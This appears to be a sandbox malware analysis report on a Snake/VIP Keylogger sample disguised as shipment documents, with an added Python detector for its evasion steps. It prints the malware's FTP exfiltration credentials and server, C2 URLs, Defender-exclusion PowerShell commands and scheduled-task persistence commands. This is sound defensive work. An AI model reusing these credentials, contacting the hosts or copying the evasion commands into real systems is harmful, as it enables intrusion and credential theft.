Windows Analysis Report
rShipmentDocuments.exe

Overview

General Information

Sample name: rShipmentDocuments.exe
Analysis ID: 1531471
MD5: ff8c4ab4ec18f05864879323f4a41050
SHA1: 6552329870d1a2627b5e9b6b6cfd3d2efea87735
SHA256: db4523c5fa05acf8d6c8d47c722a5c39a728078f94a7f6877faa0a6fb87afc33
Tags: exe, SnakeKeylogger, user-Porcupine

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rShipmentDocuments.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rShipmentDocuments.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • rShipmentDocuments.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
  • ZOlmYtPdlO.exe (PID: 7824 cmdline: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe MD5: FF8C4AB4EC18F05864879323F4A41050)
    • schtasks.exe (PID: 8072 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ZOlmYtPdlO.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • ZOlmYtPdlO.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • ZOlmYtPdlO.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
  • cleanup
Malware configuration:
{"Exfil Mode": "FTP", "Username": "Soma@hulonqgroup.com", "Password": "TNwhAkO^1&lZ", "FTP Server": "ftp://185.230.141.85/", "Version": "4.4"}
Yara matches, memory dumps (Source | Rule | Description | Author):

00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xd6c3:$a1: get_encryptedPassword
  • 0xd9e0:$a2: get_encryptedUsername
  • 0xd4d3:$a3: get_timePasswordChanged
  • 0xd5dc:$a4: get_passwordField
  • 0xd6d9:$a5: set_encryptedPassword
  • 0xed7a:$a7: get_logins
  • 0xecdd:$a10: KeyLoggerEventArgs
  • 0xe942:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(27 entries in total; the remainder are not shown here)

Yara matches, unpacked PE files (Source | Rule | Description | Author):

0.2.rShipmentDocuments.exe.44114f8.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.rShipmentDocuments.exe.44114f8.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.2.rShipmentDocuments.exe.44114f8.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.rShipmentDocuments.exe.44114f8.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2cac3:$a1: get_encryptedPassword
  • 0x2cde0:$a2: get_encryptedUsername
  • 0x2c8d3:$a3: get_timePasswordChanged
  • 0x2c9dc:$a4: get_passwordField
  • 0x2cad9:$a5: set_encryptedPassword
  • 0x2e17a:$a7: get_logins
  • 0x2e0dd:$a10: KeyLoggerEventArgs
  • 0x2dd42:$a11: KeyLoggerEventArgsEventHandler
0.2.rShipmentDocuments.exe.44114f8.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3a860:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x39f03:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3a160:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3ab3f:$a5: \Kometa\User Data\Default\Login Data
(51 entries in total; the remainder are not shown here)

                System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", ProcessId: 7488, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", ProcessId: 7488, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe, ParentImage: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe, ParentProcessId: 7824, ParentProcessName: ZOlmYtPdlO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp", ProcessId: 8072, ProcessName: schtasks.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", ProcessId: 7616, ProcessName: schtasks.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", ProcessId: 7488, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started
Author: Joe Security
Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", ProcessId: 7616, ProcessName: schtasks.exe
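The two Sigma hits above (a Defender exclusion added for a file in the user's profile, and a scheduled task created from an XML definition in %TEMP%) are the defence-evasion and persistence steps of this sample. The following is an added detection example written for this report, not Joe Sandbox or Sigma code. It parses process-creation records in a constructed Sysmon-like "key=value | key=value" form (the records mirror PIDs 7488, 7544 and 7616 from the process tree plus two benign controls; they are not real telemetry) and flags the two behaviours only when the path involved sits in a user-writable location, which is what separates them from routine administration.

```python
"""Flag Add-MpPreference exclusions on user-writable paths and schtasks /XML from %TEMP%.

Added example for this report; not Joe Sandbox or Sigma code. Input records are
constructed in a Sysmon Event ID 1-like 'key=value | key=value' form.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass

USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(Desktop|AppData|Downloads|Documents)\\", re.I)
TEMP_DIR = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)
WINDOWS_DIR = re.compile(r"^[A-Za-z]:\\Windows\\", re.I)

# Constructed records: three mirror the report's process tree, two are benign controls.
SAMPLE_EVENTS = [
    r'ProcessId=7488 | Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | CommandLine="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe" | ParentImage=C:\Users\user\Desktop\rShipmentDocuments.exe',
    r'ProcessId=7544 | Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | CommandLine="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" | ParentImage=C:\Users\user\Desktop\rShipmentDocuments.exe',
    r'ProcessId=7616 | Image=C:\Windows\SysWOW64\schtasks.exe | CommandLine="C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp" | ParentImage=C:\Users\user\Desktop\rShipmentDocuments.exe',
    r'ProcessId=9001 | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine="powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\BuildAgent" | ParentImage=C:\Windows\explorer.exe',
    r'ProcessId=9002 | Image=C:\Windows\System32\schtasks.exe | CommandLine="C:\Windows\System32\schtasks.exe" /Create /TN "Vendor\Updater" /XML "C:\ProgramData\Vendor\updater.xml" | ParentImage=C:\Windows\System32\msiexec.exe',
]


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str
    parent_image: str
    parent_outside_windows: bool


def parse_event(line: str) -> dict:
    """Split a constructed 'key=value | key=value' record into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def split_windows_cmdline(cmdline: str) -> list[str]:
    """Tokenise a Windows command line; posix=False keeps backslashes literal."""
    return [tok.strip("\"'") for tok in shlex.split(cmdline, posix=False)]


def detect(events: list[dict]) -> list[Finding]:
    findings = []
    for ev in events:
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "")
        args = split_windows_cmdline(ev.get("CommandLine", ""))
        lowered = [a.lower() for a in args]
        pid = int(ev.get("ProcessId", "0"))
        outside = not WINDOWS_DIR.match(parent)

        if image.endswith("powershell.exe") and "add-mppreference" in lowered:
            for i, tok in enumerate(lowered):
                # -ExclusionPath / -ExclusionProcess / -ExclusionExtension each take a value
                if tok.startswith("-exclusion") and i + 1 < len(args):
                    target = args[i + 1]
                    if USER_WRITABLE.match(target):
                        findings.append(Finding(pid, "defender_exclusion_user_path",
                                                target, parent, outside))

        if image.endswith("schtasks.exe") and "/create" in lowered and "/xml" in lowered:
            idx = lowered.index("/xml")
            xml = args[idx + 1] if idx + 1 < len(args) else ""
            if TEMP_DIR.match(xml):
                findings.append(Finding(pid, "schtasks_xml_from_temp", xml, parent, outside))
    return findings


def run_sample() -> list[Finding]:
    return detect([parse_event(line) for line in SAMPLE_EVENTS])


if __name__ == "__main__":
    for f in run_sample():
        print(f"PID {f.pid}: {f.rule} -> {f.detail} "
              f"(parent {f.parent_image}, outside Windows dir: {f.parent_outside_windows})")
```

The two control records (an exclusion under Program Files launched from explorer.exe, and a task XML under ProgramData launched by msiexec.exe) produce no finding; the three records taken from this report do, and in every case the parent binary lives outside C:\Windows, which is worth surfacing in the alert so an analyst sees the dropper path alongside the evasion step.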
Suricata IDS alerts, severity 3 (SID 2803305):

Timestamp                        SID      Severity  Classtype        Source IP    Src port  Destination IP  Dst port  Protocol
2024-10-11T09:35:20.420242+0200  2803305  3         Unknown Traffic  192.168.2.4  49738     188.114.96.3    443       TCP
2024-10-11T09:35:21.683879+0200  2803305  3         Unknown Traffic  192.168.2.4  49741     188.114.96.3    443       TCP
2024-10-11T09:35:22.078082+0200  2803305  3         Unknown Traffic  192.168.2.4  49742     188.114.96.3    443       TCP
2024-10-11T09:35:23.033039+0200  2803305  3         Unknown Traffic  192.168.2.4  49745     188.114.96.3    443       TCP
2024-10-11T09:35:23.360136+0200  2803305  3         Unknown Traffic  192.168.2.4  49746     188.114.96.3    443       TCP
2024-10-11T09:35:24.346686+0200  2803305  3         Unknown Traffic  192.168.2.4  49749     188.114.96.3    443       TCP
2024-10-11T09:35:29.560790+0200  2803305  3         Unknown Traffic  192.168.2.4  49765     188.114.96.3    443       TCP
2024-10-11T09:35:30.000137+0200  2803305  3         Unknown Traffic  192.168.2.4  49766     188.114.96.3    443       TCP

Suricata IDS alerts, severity 2 (SID 2803274):

Timestamp                        SID      Severity  Classtype                Source IP    Src port  Destination IP  Dst port  Protocol
2024-10-11T09:35:17.205286+0200  2803274  2         Potentially Bad Traffic  192.168.2.4  49733     132.226.247.73  80        TCP
2024-10-11T09:35:19.911334+0200  2803274  2         Potentially Bad Traffic  192.168.2.4  49733     132.226.247.73  80        TCP
2024-10-11T09:35:20.642777+0200  2803274  2         Potentially Bad Traffic  192.168.2.4  49737     132.226.247.73  80        TCP
2024-10-11T09:35:21.299031+0200  2803274  2         Potentially Bad Traffic  192.168.2.4  49739     132.226.247.73  80        TCP
2024-10-11T09:35:21.549600+0200  2803274  2         Potentially Bad Traffic  192.168.2.4  49737     132.226.247.73  80        TCP
2024-10-11T09:35:22.814729+0200  2803274  2         Potentially Bad Traffic  192.168.2.4  49744     132.226.247.73  80        TCP

                AV Detection

Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "Soma@hulonqgroup.com", "Password": "TNwhAkO^1&lZ", "FTP Server": "ftp://185.230.141.85/", "Version": "4.4"}
Source: http://varders.kozow.com:8081 | Virustotal: Detection: 14%
Source: http://aborters.duckdns.org:8081 | Virustotal: Detection: 13%
Source: http://51.38.247.67:8081/_send_.php?L | Virustotal: Detection: 7%
Source: http://anotherarmy.dns.army:8081 | Virustotal: Detection: 17%
Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Virustotal: Detection: 37%
Source: rShipmentDocuments.exe | Virustotal: Detection: 37%
Source: rShipmentDocuments.exe | ReversingLabs: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Joe Sandbox ML: detected
Source: rShipmentDocuments.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: rShipmentDocuments.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: rShipmentDocuments.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 02A3F45Dh | 9_2_02A3F2C0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 02A3F45Dh | 9_2_02A3F4AC
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 02A3FC19h | 9_2_02A3F961
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068F31E8h | 9_2_068F2DD0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FF661h | 9_2_068FF3B8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068F0D0Dh | 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068F1697h | 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068F2C21h | 9_2_068F2970
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FE959h | 9_2_068FE6B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FE0A9h | 9_2_068FDE00
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 9_2_068F0673
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FF209h | 9_2_068FEF60
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FCF49h | 9_2_068FCCA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068F31E8h | 9_2_068F2DCA
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FD7F9h | 9_2_068FD550
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FE501h | 9_2_068FE258
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FEDB1h | 9_2_068FEB08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FD3A1h | 9_2_068FD0F8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FFAB9h | 9_2_068FF810
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 9_2_068F0040
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 9_2_068F0853
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068FDC51h | 9_2_068FD9A8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Code function: 4x nop then jmp 068F31E8h | 9_2_068F3116
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 069C9E1Dh | 10_2_069CA0A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 0303F45Dh | 16_2_0303F2C0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 0303F45Dh | 16_2_0303F4AC
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 0303FC19h | 16_2_0303F961
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8F661h | 16_2_06D8F3B8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D80D0Dh | 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D81697h | 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D831E0h | 16_2_06D82DC8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D82C19h | 16_2_06D82968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8E959h | 16_2_06D8E6B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8E501h | 16_2_06D8E258
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 16_2_06D80673
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8E0A9h | 16_2_06D8DE00
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8F209h | 16_2_06D8EF60
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8EDB1h | 16_2_06D8EB08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8D3A1h | 16_2_06D8D0F8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8CF49h | 16_2_06D8CCA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 16_2_06D80853
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 16_2_06D80040
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8FAB9h | 16_2_06D8F810
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D831E0h | 16_2_06D82DC3
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8DC51h | 16_2_06D8D9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D8D7F9h | 16_2_06D8D550
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Code function: 4x nop then jmp 06D831E0h | 16_2_06D8310E

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
